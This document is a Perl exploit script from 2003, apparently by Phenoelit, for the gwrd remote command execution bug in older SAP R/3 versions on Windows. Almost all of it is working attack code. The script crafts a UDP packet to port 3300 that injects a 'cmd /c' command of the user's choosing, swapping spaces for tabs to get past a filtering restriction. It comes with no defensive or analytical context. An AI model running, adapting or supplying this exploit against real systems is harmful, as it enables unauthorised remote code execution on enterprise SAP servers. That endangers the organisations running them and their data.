Original Win32 version of the exploit for the gwrd bug in SAP versions below 4.6D patch 1767 and versions below 6.40 patch 4. Allows for remote command execution.
846933d938c8ba642bdaaea38a839367e37ffc3c050691922428ea4ccbdad92d
#!/usr/bin/perl -w
use IO::Socket;
#
# Executes the command given as first argument as a child process of
# gwrd in Windows R/3 environments. Request packet may not contain space
# character (0x20). The command interpreter must obviously be modified
# for other (UNIX) environments.
#
# 2003, FX of Phenoelit <fx@phenoelit.de>
#
$|=1;
# MSDN documentation of CreateProcess() :
# http://msdn.microsoft.com/library/en-us/dllproc/base/createprocess.asp
die "Give command" unless ($command=shift);
die "Give host" unless ($host=shift);
$port="3300" unless ($port=shift);
$command=~s/ /\x09/g;
$request =
"\x01".
"\x02".
"\x41\x42\x43".
"\x01".
"\x20".
"\x00\x00\x00".
"\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50".
"\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51".
"\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52".
"\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53".
"\x54\x54\x09\x09\x09\x09\x09\x09\x09\x09".
"A\x09\x09\x09\x09\x09\x09\x09\x09".
"AAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00".
# Command to be injected, must end with && since 0x00
# termination does not work here
"cmd\x09/c\x09(".$command.")\x09"."&&".
"";
&send_UDP($host,$port);
exit 0;
sub send_UDP {
my $remote;
my $rline;
my $dest;
my $port;
($dest,$port) = @_;
$remote =
IO::Socket::INET->new(Proto=>"udp",PeerAddr=>$dest,PeerPort=>"$port",);
unless ($remote) { die "cannot get socket for $dest" }
$remote->autoflush(1);
print $remote $request;
close $remote;
}